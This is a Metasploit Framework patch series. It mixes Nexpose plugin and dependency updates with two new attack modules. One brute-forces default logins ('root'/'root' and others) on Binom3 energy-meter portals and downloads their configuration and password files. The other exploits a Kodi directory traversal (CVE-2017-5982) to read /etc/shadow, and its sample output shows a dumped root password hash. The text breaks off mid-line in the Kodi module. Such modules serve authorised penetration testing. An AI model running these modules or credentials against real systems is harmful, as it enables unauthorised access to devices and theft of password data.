b/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb index c0636e47c6..f2f0640679 100644 --- a/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb +++ b/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb @@ -4,7 +4,7 @@ ## require 'msf/core' -require 'rapid7/nexpose' +require 'nexpose' class MetasploitModule < Msf::Auxiliary @@ -140,7 +140,7 @@ class MetasploitModule < Msf::Auxiliary print_status("Cleaning up") begin - nsc.site_delete id + nsc.delete_site id rescue print_warning("Error while cleaning up site ID, manual cleanup required!") end From 3ced5aece1663aec630efc1f0a76184f23673f8c Mon Sep 17 00:00:00 2001 From: Louis Sato Date: Tue, 12 Apr 2016 15:38:34 -0500 Subject: [PATCH 03/37] added default name for nexpose site cred --- plugins/nexpose.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/plugins/nexpose.rb b/plugins/nexpose.rb index 854a3dfd53..bd1380f6bf 100644 --- a/plugins/nexpose.rb +++ b/plugins/nexpose.rb @@ -385,7 +385,8 @@ class Plugin::Nexpose < Msf::Plugin when "-c" if (val =~ /^([^:]+):([^:]+):(.+)/) type, user, pass = [ $1, $2, $3 ] - newcreds = Nexpose::SiteCredentials.for_service("temporary_name", nil, nil, nil, nil, type) + msfid = Time.now.to_i + newcreds = Nexpose::SiteCredentials.for_service("Metasploit Site Credential #{msfid}", nil, nil, nil, nil, type) newcreds.user_name = user newcreds.password = pass opt_credentials << newcreds From 4af1b595cd5cb3b9ad4dba99b916854be069a1fa Mon Sep 17 00:00:00 2001 From: Jeffrey Martin Date: Wed, 25 Jan 2017 10:32:23 -0600 Subject: [PATCH 04/37] update Gemfile.lock --- Gemfile.lock | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/Gemfile.lock b/Gemfile.lock index f882496a78..c844472dc8 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -21,6 +21,7 @@ PATH nessus_rest net-ssh network_interface + nexpose nokogiri octokit openssl-ccm @@ -187,13 +188,14 @@ GEM mime-types-data (3.2016.0521) mini_portile2 (2.1.0) minitest (5.10.1) - msgpack (1.0.2) + msgpack (1.0.3) multi_json (1.12.1) multi_test (0.1.2) multipart-post (2.0.0) nessus_rest (0.1.6) net-ssh (4.0.1) network_interface (0.0.1) + nexpose (5.1.0) nokogiri (1.7.0.1) mini_portile2 (~> 2.1.0) octokit (4.6.2) From 59e31e26f22395c9ff9b5d85c02953a10ae0972c Mon Sep 17 00:00:00 2001 From: juushya Date: Wed, 1 Feb 2017 03:35:35 +0530 Subject: [PATCH 05/37] Add Binom3 module --- .../http/binom3_login_config_pass_dump.md | 33 +++ .../http/binom3_login_config_pass_dump.rb | 206 ++++++++++++++++++ 2 files changed, 239 insertions(+) create mode 100644 documentation/modules/auxiliary/scanner/http/binom3_login_config_pass_dump.md create mode 100644 modules/auxiliary/scanner/http/binom3_login_config_pass_dump.rb diff --git a/documentation/modules/auxiliary/scanner/http/binom3_login_config_pass_dump.md b/documentation/modules/auxiliary/scanner/http/binom3_login_config_pass_dump.md new file mode 100644 index 0000000000..b52f405c88 --- /dev/null +++ b/documentation/modules/auxiliary/scanner/http/binom3_login_config_pass_dump.md @@ -0,0 +1,33 @@ +This module scans for Binom3 Multifunctional Revenue Energy Meter and Power Quality Analyzer management login portal(s), and attempts to identify valid credentials. There are four (4) default accounts - 'root'/'root', 'admin'/'1', 'alg'/'1', 'user'/'1'. In addition to device config, 'root' user can also access password file. Other users - admin, alg, user - can only access configuration file. The module attempts to download configuration and password files depending on the login user credentials found. + +## Verification Steps + +1. Do: ```use auxiliary/scanner/http/binom3_login_config_pass_dump``` +2. Do: ```set RHOSTS [IP]``` +3. Do: ```set RPORT [PORT]``` +4. Do: ```run``` + +## Sample Output + + ``` +msf > use auxiliary/scanner/http/binom3_login_config_pass_dump +msf auxiliary(binom3_login_config_pass_dump) > set rhosts 1.2.3.4 +msf auxiliary(binom3_login_config_pass_dump) > run + +[+] 1.3.3.7:80 - Running Binom3... +[*] 1.3.3.7:80 - Trying username:"root" with password:"root" +[+] SUCCESSFUL LOGIN - 1.3.3.7:80 - "root":"root" +[+] ++++++++++++++++++++++++++++++++++++++ +[+] #{rhost} - dumping configuration +[+] ++++++++++++++++++++++++++++++++++++++ +[+] 1.3.3.7:80 - File retrieved successfully! +[*] 1.3.3.7:80 - File saved in: /root/.msf4/loot/20000000000003_moduletest_1.3.3.7_Binom3_config_165927.txt +[+] ++++++++++++++++++++++++++++++++++++++ +[+] #{rhost} - dumping password file +[+] ++++++++++++++++++++++++++++++++++++++ +[+] 1.3.3.7:80 - File retrieved successfully! +[*] 1.3.3.7:80 - File saved in: /root/.msf4/loot/20000000000004_moduletest_1.3.3.7_Binom3_passw_010954.txt +[*] Scanned 1 of 1 hosts (100% complete) +[*] Auxiliary module execution completed + + ``` diff --git a/modules/auxiliary/scanner/http/binom3_login_config_pass_dump.rb b/modules/auxiliary/scanner/http/binom3_login_config_pass_dump.rb new file mode 100644 index 0000000000..284580a965 --- /dev/null +++ b/modules/auxiliary/scanner/http/binom3_login_config_pass_dump.rb @@ -0,0 +1,206 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::AuthBrute + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Binom3 Web Management Login Scanner, Config and Password File Dump', + 'Description' => %{ + This module scans for Binom3 Multifunctional Revenue Energy Meter and Power Quality Analyzer management login portal(s), and attempts to identify valid credentials. There are four (4) default accounts - 'root'/'root', 'admin'/'1', 'alg'/'1', 'user'/'1'. In addition to device config, 'root' user can also access password file. Other users - admin, alg, user - can only access configuration file. The module attempts to download configuration and password files depending on the login user credentials found. + + }, + 'References' => + [ + ['URL', 'https://ics-cert.us-cert.gov/alerts/ICS-ALERT-16-263-01'] + ], + 'Author' => + [ + 'Karn Ganeshen ' + ], + 'License' => MSF_LICENSE, + 'DefaultOptions' => { 'VERBOSE' => true }) + ) + + register_options( + [ + Opt::RPORT(80), # Application may run on a different port too. Change port accordingly. + OptString.new('USERNAME', [false, 'A specific username to authenticate as', 'root']), + OptString.new('PASSWORD', [false, 'A specific password to authenticate with', 'root']) + ], self.class + ) + end + + def run_host(ip) + unless is_app_binom3? + return + end + + each_user_pass do |user, pass| + do_login(user, pass) + end + end + + def report_cred(opts) + service_data = { + address: opts[:ip], + port: opts[:port], + service_name: opts[:service_name], + protocol: 'tcp', + workspace_id: myworkspace_id + } + + credential_data = { + origin_type: :service, + module_fullname: fullname, + username: opts[:user], + private_data: opts[:password], + private_type: :password + }.merge(service_data) + + login_data = { + last_attempted_at: Time.now, + core: create_credential(credential_data), + status: Metasploit::Model::Login::Status::SUCCESSFUL, + proof: opts[:proof] + }.merge(service_data) + + create_credential_login(login_data) + end + + # + # Check if App is Binom3 + # + + def is_app_binom3? + begin + res = send_request_cgi( + { + 'uri' => '/', + 'method' => 'GET' + } + ) + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE + print_error("#{rhost}:#{rport} - HTTP Connection Failed...") + return false + end + + if (res && res.code == 200 && res.headers['Server'] && (res.headers['Server'].include?('Team-R Web') || res.body.include?('binom_ico') || res.body.include?('team-r'))) + + print_good("#{rhost}:#{rport} - Running Binom3...") + + return true + else + print_error("#{rhost}:#{rport} - Application does not appear to be Binom3. Module will not continue.") + return false + end + end + + # + # Brute-force the login page + # + + def do_login(user, pass) + print_status("#{rhost}:#{rport} - Trying username:#{user.inspect} with password:#{pass.inspect}") + begin + + res = send_request_cgi( + { + 'uri' => '/~login', + 'method' => 'POST', + 'headers' => { 'Content-Type' => 'application/x-www-form-urlencoded' }, + 'vars_post' => + { + 'login' => user, + 'password' => pass + } + } + ) + + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE + + vprint_error("#{rhost}:#{rport} - HTTP Connection Failed...") + return :abort + + end + + if (res && res.code == 302 && res.get_cookies.include?('IDSESSION')) + + print_good("SUCCESSFUL LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}") + + report_cred( + ip: rhost, + port: rport, + service_name: 'Binom3', + user: user, + password: pass + ) + + # Set Cookie + + get_cookie = res.get_cookies + cookie = get_cookie + ' NO-HELP=true; onlyRu=1' + + # Attempting to download config / password file(s) + + config_uri = '~cfg_ask_xml?type=cfg' + + res = send_request_cgi({ 'method' => 'GET', 'uri' => config_uri, 'cookie' => cookie }) + + if res && res.code == 200 + print_good('++++++++++++++++++++++++++++++++++++++') + print_good('#{rhost} - dumping configuration') + print_good('++++++++++++++++++++++++++++++++++++++') + + print_good("#{rhost}:#{rport} - File retrieved successfully!") + path = store_loot( + 'Binom3_config', + 'text/xml', + rhost, + res.body, + rport, + 'Binom3 device config' + ) + print_status("#{rhost}:#{rport} - File saved in: #{path}") + else + print_error("#{rhost}:#{rport} - Failed to retrieve configuration") + return + end + + if user == 'root' + config_uri = '~cfg_ask_xml?type=passw' + res = send_request_cgi({ 'method' => 'GET', 'uri' => config_uri, 'cookie' => cookie }) + + if res && res.code == 200 + print_good('++++++++++++++++++++++++++++++++++++++') + print_good('#{rhost} - dumping password file') + print_good('++++++++++++++++++++++++++++++++++++++') + + print_good("#{rhost}:#{rport} - File retrieved successfully!") + path = store_loot( + 'Binom3_passw', + 'text/xml', + rhost, + res.body, + rport, + 'Binom3 device config' + ) + print_status("#{rhost}:#{rport} - File saved in: #{path}") + else + print_error("#{rhost}:#{rport} - Failed to retrieve password file") + return + end + end + else + print_error("FAILED LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}") + end + end +end From 82d277741761a4e9ccb7a48e40ef45620f10dbf3 Mon Sep 17 00:00:00 2001 From: juushya Date: Wed, 1 Feb 2017 03:44:50 +0530 Subject: [PATCH 06/37] Minor update --- .../auxiliary/scanner/http/binom3_login_config_pass_dump.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/http/binom3_login_config_pass_dump.rb b/modules/auxiliary/scanner/http/binom3_login_config_pass_dump.rb index 284580a965..26ea9fba6c 100644 --- a/modules/auxiliary/scanner/http/binom3_login_config_pass_dump.rb +++ b/modules/auxiliary/scanner/http/binom3_login_config_pass_dump.rb @@ -157,7 +157,7 @@ class MetasploitModule < Msf::Auxiliary if res && res.code == 200 print_good('++++++++++++++++++++++++++++++++++++++') - print_good('#{rhost} - dumping configuration') + print_good("#{rhost} - dumping configuration") print_good('++++++++++++++++++++++++++++++++++++++') print_good("#{rhost}:#{rport} - File retrieved successfully!") @@ -181,7 +181,7 @@ class MetasploitModule < Msf::Auxiliary if res && res.code == 200 print_good('++++++++++++++++++++++++++++++++++++++') - print_good('#{rhost} - dumping password file') + print_good("#{rhost} - dumping password file") print_good('++++++++++++++++++++++++++++++++++++++') print_good("#{rhost}:#{rport} - File retrieved successfully!") From 423648e347c059d5e20dda0166f2b825efed3d1b Mon Sep 17 00:00:00 2001 From: juushya Date: Wed, 1 Feb 2017 03:53:14 +0530 Subject: [PATCH 07/37] Minor edits --- .../scanner/http/binom3_login_config_pass_dump.md | 8 ++++---- .../scanner/http/binom3_login_config_pass_dump.rb | 2 +- 2 files changed, 5 insertions(+), 5 deletions(-) diff --git a/documentation/modules/auxiliary/scanner/http/binom3_login_config_pass_dump.md b/documentation/modules/auxiliary/scanner/http/binom3_login_config_pass_dump.md index b52f405c88..cdfc0f1acb 100644 --- a/documentation/modules/auxiliary/scanner/http/binom3_login_config_pass_dump.md +++ b/documentation/modules/auxiliary/scanner/http/binom3_login_config_pass_dump.md @@ -11,19 +11,19 @@ This module scans for Binom3 Multifunctional Revenue Energy Meter and Power Qual ``` msf > use auxiliary/scanner/http/binom3_login_config_pass_dump -msf auxiliary(binom3_login_config_pass_dump) > set rhosts 1.2.3.4 +msf auxiliary(binom3_login_config_pass_dump) > set rhosts 1.3.3.7 msf auxiliary(binom3_login_config_pass_dump) > run -[+] 1.3.3.7:80 - Running Binom3... +[+] 1.3.3.7:80 - Binom3 confirmed... [*] 1.3.3.7:80 - Trying username:"root" with password:"root" [+] SUCCESSFUL LOGIN - 1.3.3.7:80 - "root":"root" [+] ++++++++++++++++++++++++++++++++++++++ -[+] #{rhost} - dumping configuration +[+] 1.3.3.7 - dumping configuration [+] ++++++++++++++++++++++++++++++++++++++ [+] 1.3.3.7:80 - File retrieved successfully! [*] 1.3.3.7:80 - File saved in: /root/.msf4/loot/20000000000003_moduletest_1.3.3.7_Binom3_config_165927.txt [+] ++++++++++++++++++++++++++++++++++++++ -[+] #{rhost} - dumping password file +[+] 1.3.3.7 - dumping password file [+] ++++++++++++++++++++++++++++++++++++++ [+] 1.3.3.7:80 - File retrieved successfully! [*] 1.3.3.7:80 - File saved in: /root/.msf4/loot/20000000000004_moduletest_1.3.3.7_Binom3_passw_010954.txt diff --git a/modules/auxiliary/scanner/http/binom3_login_config_pass_dump.rb b/modules/auxiliary/scanner/http/binom3_login_config_pass_dump.rb index 26ea9fba6c..65c47dc93f 100644 --- a/modules/auxiliary/scanner/http/binom3_login_config_pass_dump.rb +++ b/modules/auxiliary/scanner/http/binom3_login_config_pass_dump.rb @@ -95,7 +95,7 @@ class MetasploitModule < Msf::Auxiliary if (res && res.code == 200 && res.headers['Server'] && (res.headers['Server'].include?('Team-R Web') || res.body.include?('binom_ico') || res.body.include?('team-r'))) - print_good("#{rhost}:#{rport} - Running Binom3...") + print_good("#{rhost}:#{rport} - Binom3 confirmed...") return true else From 34b861403ee6845507f271e166ce517fbac61e86 Mon Sep 17 00:00:00 2001 From: juushya Date: Sat, 4 Feb 2017 01:44:18 +0530 Subject: [PATCH 08/37] Minor updates --- .../http/binom3_login_config_pass_dump.rb | 55 +++++++++---------- 1 file changed, 26 insertions(+), 29 deletions(-) diff --git a/modules/auxiliary/scanner/http/binom3_login_config_pass_dump.rb b/modules/auxiliary/scanner/http/binom3_login_config_pass_dump.rb index 65c47dc93f..c4c3d0717b 100644 --- a/modules/auxiliary/scanner/http/binom3_login_config_pass_dump.rb +++ b/modules/auxiliary/scanner/http/binom3_login_config_pass_dump.rb @@ -16,11 +16,10 @@ class MetasploitModule < Msf::Auxiliary 'Name' => 'Binom3 Web Management Login Scanner, Config and Password File Dump', 'Description' => %{ This module scans for Binom3 Multifunctional Revenue Energy Meter and Power Quality Analyzer management login portal(s), and attempts to identify valid credentials. There are four (4) default accounts - 'root'/'root', 'admin'/'1', 'alg'/'1', 'user'/'1'. In addition to device config, 'root' user can also access password file. Other users - admin, alg, user - can only access configuration file. The module attempts to download configuration and password files depending on the login user credentials found. - }, 'References' => [ - ['URL', 'https://ics-cert.us-cert.gov/alerts/ICS-ALERT-16-263-01'] + ['URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-17-031-01'] ], 'Author' => [ @@ -149,18 +148,18 @@ class MetasploitModule < Msf::Auxiliary get_cookie = res.get_cookies cookie = get_cookie + ' NO-HELP=true; onlyRu=1' - # Attempting to download config / password file(s) + # Attempting to download config file config_uri = '~cfg_ask_xml?type=cfg' res = send_request_cgi({ 'method' => 'GET', 'uri' => config_uri, 'cookie' => cookie }) if res && res.code == 200 - print_good('++++++++++++++++++++++++++++++++++++++') - print_good("#{rhost} - dumping configuration") - print_good('++++++++++++++++++++++++++++++++++++++') + vprint_status('++++++++++++++++++++++++++++++++++++++') + vprint_status("#{rhost} - dumping configuration") + vprint_status('++++++++++++++++++++++++++++++++++++++') - print_good("#{rhost}:#{rport} - File retrieved successfully!") + print_good("#{rhost}:#{rport} - Configuration file retrieved successfully!") path = store_loot( 'Binom3_config', 'text/xml', @@ -169,35 +168,33 @@ class MetasploitModule < Msf::Auxiliary rport, 'Binom3 device config' ) - print_status("#{rhost}:#{rport} - File saved in: #{path}") + print_status("#{rhost}:#{rport} - Configuration file saved in: #{path}") else print_error("#{rhost}:#{rport} - Failed to retrieve configuration") return end - if user == 'root' - config_uri = '~cfg_ask_xml?type=passw' - res = send_request_cgi({ 'method' => 'GET', 'uri' => config_uri, 'cookie' => cookie }) + # Attempt to dump password file + config_uri = '~cfg_ask_xml?type=passw' + res = send_request_cgi({ 'method' => 'GET', 'uri' => config_uri, 'cookie' => cookie }) - if res && res.code == 200 - print_good('++++++++++++++++++++++++++++++++++++++') - print_good("#{rhost} - dumping password file") - print_good('++++++++++++++++++++++++++++++++++++++') + if res && res.code == 200 + vprint_status('++++++++++++++++++++++++++++++++++++++') + vprint_status("#{rhost} - dumping password file") + vprint_status('++++++++++++++++++++++++++++++++++++++') - print_good("#{rhost}:#{rport} - File retrieved successfully!") - path = store_loot( - 'Binom3_passw', - 'text/xml', - rhost, - res.body, - rport, - 'Binom3 device config' - ) - print_status("#{rhost}:#{rport} - File saved in: #{path}") - else - print_error("#{rhost}:#{rport} - Failed to retrieve password file") - return - end + print_good("#{rhost}:#{rport} - Password file retrieved successfully!") + path = store_loot( + 'Binom3_passw', + 'text/xml', + rhost, + res.body, + rport, + 'Binom3 device config' + ) + print_status("#{rhost}:#{rport} - Password file saved in: #{path}") + else + return end else print_error("FAILED LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}") From cbfe18e4d7759a6f7b15fed9249131da4121aa54 Mon Sep 17 00:00:00 2001 From: Jeffrey Martin Date: Thu, 3 Nov 2016 15:54:07 -0500 Subject: [PATCH 09/37] use certificates in nexpose --- Gemfile.lock | 4 +- .../admin/http/nexpose_xxe_file_read.rb | 3 +- plugins/nexpose.rb | 55 ++++++++++++------- 3 files changed, 38 insertions(+), 24 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index c844472dc8..7b02e5f5d6 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -195,7 +195,7 @@ GEM nessus_rest (0.1.6) net-ssh (4.0.1) network_interface (0.0.1) - nexpose (5.1.0) + nexpose (5.3.0) nokogiri (1.7.0.1) mini_portile2 (~> 2.1.0) octokit (4.6.2) @@ -350,4 +350,4 @@ DEPENDENCIES yard BUNDLED WITH - 1.13.7 + 1.14.3 diff --git a/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb b/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb index f2f0640679..6e20542aee 100644 --- a/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb +++ b/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb @@ -74,9 +74,10 @@ class MetasploitModule < Msf::Auxiliary def run user = datastore['USERNAME'] pass = datastore['PASSWORD'] + trust_store = datastore['TRUST_STORE'] prot = ssl ? 'https' : 'http' - nsc = Nexpose::Connection.new(rhost, user, pass, rport) + nsc = Nexpose::Connection.new(rhost, user, pass, rport, nil, nil, trust_store) print_status("Authenticating as: " << user) begin diff --git a/plugins/nexpose.rb b/plugins/nexpose.rb index bd1380f6bf..8f96490484 100644 --- a/plugins/nexpose.rb +++ b/plugins/nexpose.rb @@ -81,7 +81,7 @@ class Plugin::Nexpose < Msf::Plugin group = "default" if ((@user and @user.length > 0) and (@host and @host.length > 0) and (@port and @port.length > 0 and @port.to_i > 0) and (@pass and @pass.length > 0)) - config = {"#{group}" => {'username' => @user, 'password' => @pass, 'server' => @host, 'port' => @port}} + config = {"#{group}" => {'username' => @user, 'password' => @pass, 'server' => @host, 'port' => @port, 'trust_cert' => @trust_cert}} ::File.open("#{Nexpose_yaml}", "wb") { |f| f.puts YAML.dump(config) } print_good("#{Nexpose_yaml} created.") else @@ -100,21 +100,21 @@ class Plugin::Nexpose < Msf::Plugin @pass = lconfig['default']['password'] @host = lconfig['default']['server'] @port = lconfig['default']['port'] - @sslv = "ok" # TODO: Not super-thrilled about bypassing the SSL warning... + @trust_cert = lconfig['default']['trust_cert'] + unless @trust_cert + @sslv = "ok" # TODO: Not super-thrilled about bypassing the SSL warning... + end nexpose_login return end end if(args.length == 0 or args[0].empty? or args[0] == "-h") - print_status("Usage: ") - print_status(" nexpose_connect username:password@host[:port] ") - print_status(" -OR- ") - print_status(" nexpose_connect username password host port ") + nexpose_usage return end - @user = @pass = @host = @port = @sslv = nil + @user = @pass = @host = @port = @sslv = @trust_cert = @trust_cert_file = nil case args.length when 1,2 @@ -122,31 +122,44 @@ class Plugin::Nexpose < Msf::Plugin @user,@pass = cred.split(':', 2) targ ||= '127.0.0.1:3780' @host,@port = targ.split(':', 2) - port ||= '3780' - @sslv = args[1] + @port ||= '3780' + unless args.length == 1 + @trust_cert_file = args[1] + if File.exists? @trust_cert_file + @trust_cert = File.read(@trust_cert_file) + end + end when 4,5 - @user,@pass,@host,@port,@sslv = args + @user,@pass,@host,@port,@trust_cert = args + unless args.length == 4 + @trust_cert_file = @trust_cert + if File.exists? @trust_cert_file + @trust_cert = File.read(@trust_cert_file) + end + end else - print_status("Usage: ") - print_status(" nexpose_connect username:password@host[:port] ") - print_status(" -OR- ") - print_status(" nexpose_connect username password host port ") + nexpose_usage return end nexpose_login end + def nexpose_usage + print_status("Usage: ") + print_status(" nexpose_connect username:password@host[:port] ") + print_status(" -OR- ") + print_status(" nexpose_connect username password host port ") + end + def nexpose_login if ! ((@user and @user.length > 0) and (@host and @host.length > 0) and (@port and @port.length > 0 and @port.to_i > 0) and (@pass and @pass.length > 0)) - print_status("Usage: ") - print_status(" nexpose_connect username:password@host[:port] ") - print_status(" -OR- ") - print_status(" nexpose_connect username password host port ") + nexpose_usage return end - if(@host != "localhost" and @host != "127.0.0.1" and @sslv != "ok") + if(@host != "localhost" and @host != "127.0.0.1" and (@trust_cert.nil? && @sslv != "ok")) + # consider removing this message and replacing with check on trust_store, and if trust_store is not found validate @host already has a truly trusted cert? print_error("Warning: SSL connections are not verified in this release, it is possible for an attacker") print_error(" with the ability to man-in-the-middle the Nexpose traffic to capture the Nexpose") print_error(" credentials. If you are running this on a trusted network, please pass in 'ok'") @@ -154,7 +167,7 @@ class Plugin::Nexpose < Msf::Plugin return end - # Wrap this so a duplicate session doesnt prevent a new login + # Wrap this so a duplicate session does not prevent a new login begin cmd_nexpose_disconnect rescue ::Interrupt @@ -164,7 +177,7 @@ class Plugin::Nexpose < Msf::Plugin begin print_status("Connecting to Nexpose instance at #{@host}:#{@port} with username #{@user}...") - nsc = Nexpose::Connection.new(@host, @user, @pass, @port) + nsc = Nexpose::Connection.new(@host, @user, @pass, @port, nil, nil, @trust_cert) nsc.login rescue ::Nexpose::APIError => e print_error("Connection failed: #{e.reason}") From b42beea7c67bf541054f3daebdd9512f707ce4f8 Mon Sep 17 00:00:00 2001 From: Jeffrey Martin Date: Thu, 16 Feb 2017 15:21:41 -0600 Subject: [PATCH 10/37] maintain compatibility for non-validated connect --- plugins/nexpose.rb | 10 +++++++--- 1 file changed, 7 insertions(+), 3 deletions(-) diff --git a/plugins/nexpose.rb b/plugins/nexpose.rb index 8f96490484..60d4537c77 100644 --- a/plugins/nexpose.rb +++ b/plugins/nexpose.rb @@ -127,6 +127,8 @@ class Plugin::Nexpose < Msf::Plugin @trust_cert_file = args[1] if File.exists? @trust_cert_file @trust_cert = File.read(@trust_cert_file) + else + @sslv = @trust_cert_file end end when 4,5 @@ -135,6 +137,8 @@ class Plugin::Nexpose < Msf::Plugin @trust_cert_file = @trust_cert if File.exists? @trust_cert_file @trust_cert = File.read(@trust_cert_file) + else + @sslv = @trust_cert_file end end else @@ -146,9 +150,9 @@ class Plugin::Nexpose < Msf::Plugin def nexpose_usage print_status("Usage: ") - print_status(" nexpose_connect username:password@host[:port] ") + print_status(" nexpose_connect username:password@host[:port] ") print_status(" -OR- ") - print_status(" nexpose_connect username password host port ") + print_status(" nexpose_connect username password host port ") end def nexpose_login @@ -693,4 +697,4 @@ module Nexpose end end end -end \ No newline at end of file +end From 9f5582a4e41cc05a8dc7f682c8175ea64964c2ea Mon Sep 17 00:00:00 2001 From: Jeffrey Martin Date: Thu, 16 Feb 2017 15:28:35 -0600 Subject: [PATCH 11/37] update Gemfile.lock for master merge --- Gemfile.lock | 21 ++++++++++----------- 1 file changed, 10 insertions(+), 11 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 7b02e5f5d6..54bf36a915 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -147,7 +147,7 @@ GEM filesize (0.1.1) fivemat (1.3.2) gherkin (4.0.0) - i18n (0.7.0) + i18n (0.8.0) jsobfu (0.4.2) rkelly-remix json (1.8.6) @@ -202,9 +202,8 @@ GEM sawyer (~> 0.8.0, >= 0.5.3) openssl-ccm (1.2.1) openvas-omp (0.0.4) - packetfu (1.1.11) - network_interface (~> 0.0) - pcaprub (~> 0.12) + packetfu (1.1.13.pre) + pcaprub patch_finder (1.0.2) pcaprub (0.12.4) pg (0.19.0) @@ -235,7 +234,7 @@ GEM rake (>= 0.8.7) thor (>= 0.18.1, < 2.0) rake (12.0.0) - rb-readline (0.5.3) + rb-readline (0.5.4) recog (2.1.4) nokogiri redcarpet (3.4.0) @@ -247,12 +246,12 @@ GEM rex-core rex-struct2 rex-text - rex-core (0.1.6) + rex-core (0.1.7) rex-encoder (0.1.2) metasm rex-arch rex-text - rex-exploitation (0.1.8) + rex-exploitation (0.1.10) jsobfu metasm rex-arch @@ -304,20 +303,20 @@ GEM rspec-support (~> 3.5.0) rspec-support (3.5.0) rubyntlm (0.6.1) - rubyzip (1.2.0) + rubyzip (1.2.1) sawyer (0.8.1) addressable (>= 2.3.5, < 2.6) faraday (~> 0.8, < 1.0) shoulda-matchers (3.1.1) activesupport (>= 4.0.0) - simplecov (0.12.0) + simplecov (0.13.0) docile (~> 1.1.0) json (>= 1.8, < 3) simplecov-html (~> 0.10.0) simplecov-html (0.10.0) slop (3.6.0) sqlite3 (1.3.13) - sshkey (1.8.0) + sshkey (1.9.0) thor (0.19.4) thread_safe (0.3.5) timecop (0.8.1) @@ -350,4 +349,4 @@ DEPENDENCIES yard BUNDLED WITH - 1.14.3 + 1.14.4 From 7bd6aff1cf9be9f64e340c9323fca7b2907642ee Mon Sep 17 00:00:00 2001 From: jvoisin Date: Sun, 19 Feb 2017 21:33:34 +0100 Subject: [PATCH 12/37] Add a sploit for CVE-2017-5982 --- .../auxiliary/scanner/http/kodi_traversal.md | 40 +++++++++ .../auxiliary/scanner/http/kodi_traversal.rb | 84 +++++++++++++++++++ 2 files changed, 124 insertions(+) create mode 100644 documentation/modules/auxiliary/scanner/http/kodi_traversal.md create mode 100644 modules/auxiliary/scanner/http/kodi_traversal.rb diff --git a/documentation/modules/auxiliary/scanner/http/kodi_traversal.md b/documentation/modules/auxiliary/scanner/http/kodi_traversal.md new file mode 100644 index 0000000000..870de95b28 --- /dev/null +++ b/documentation/modules/auxiliary/scanner/http/kodi_traversal.md @@ -0,0 +1,40 @@ +## Vulnerable Application + +This module exploits an arbitrary file disclosure vulnerability in Kodi 17.1. + +**Vulnerable Application Installation Steps** + +Grab whatever image from [libreelec](https://libreelec.tv/downloads/) if +you're lazy, or [install kodi from scratch](http://kodi.wiki/view/HOW-TO:Install_Kodi_for_Linux). + +You'll need a version lower than 17.1. + +## Verification Steps + +A successful check of the exploit will look like this: + +``` +msf > use auxiliary/scanner/http/kodi_traversal +msf auxiliary(kodi_traversal) > set RPORT 8080 +RPORT => 8080 +msf auxiliary(kodi_traversal) > set RHOSTS 192.168.0.31 +RHOSTS => 192.168.0.31 +msf auxiliary(kodi_traversal) > run + +[*] Reading '/etc/shadow' +[+] /etc/shadow stored as '/home/jvoisin/.msf4/loot/20170219214657_default_192.168.0.31_kodi_114009.bin' +[*] Scanned 1 of 1 hosts (100% complete) +[*] Auxiliary module execution completed +msf auxiliary(kodi_traversal) > cat /home/jvoisin/.msf4/loot/20170219214657_default_192.168.0.31_kodi_114009.bin +[*] exec: cat /home/jvoisin/.msf4/loot/20170219214657_default_192.168.0.31_kodi_114009.bin + +systemd-network:*::::::: +root:$6$ktSJvEl/p.r7nsR6$.EZhW6/TPiY.7qz.ymYSreJtHcufASE4ykx7osCfBlDXiEKqXoxltsX5fE0mY.494pJOKyuM50QfpLpNKvAPC.::::::: +nobody:*::::::: +dbus:*::::::: +system:*::::::: +sshd:*::::::: +avahi:*::::::: +msf auxiliary(kodi_traversal) > info + +``` diff --git a/modules/auxiliary/scanner/http/kodi_traversal.rb b/modules/auxiliary/scanner/http/kodi_traversal.rb new file mode 100644 index 0000000000..6c32bd9dec --- /dev/null +++ b/modules/auxiliary/scanner/http/kodi_traversal.rb @@ -0,0 +1,84 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Kodi 17.1 Local File Inclusion Vulnerability', + 'Description' => %q{ + This module exploits a directory traversal flaw found in Kodi 17.1. + }, + 'References' => + [ + ['CVE', '2017-5982'], + ], + 'Author' => + [ + 'Eric Flokstra', #Original + 'jvoisin' + ], + 'License' => MSF_LICENSE, + 'DisclosureDate' => "Feb 12 2017" + )) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The URI path to the web application', '/']), + OptString.new('FILE', [true, 'The file to obtain', '/etc/shadow']), + OptInt.new('DEPTH', [true, 'The max traversal depth to root directory', 10]) + ], self.class) + end + + + def run_host(ip) + base = normalize_uri(target_uri.path) + + peer = "#{ip}:#{rport}" + + print_status("Reading '#{datastore['FILE']}'") + + traverse = 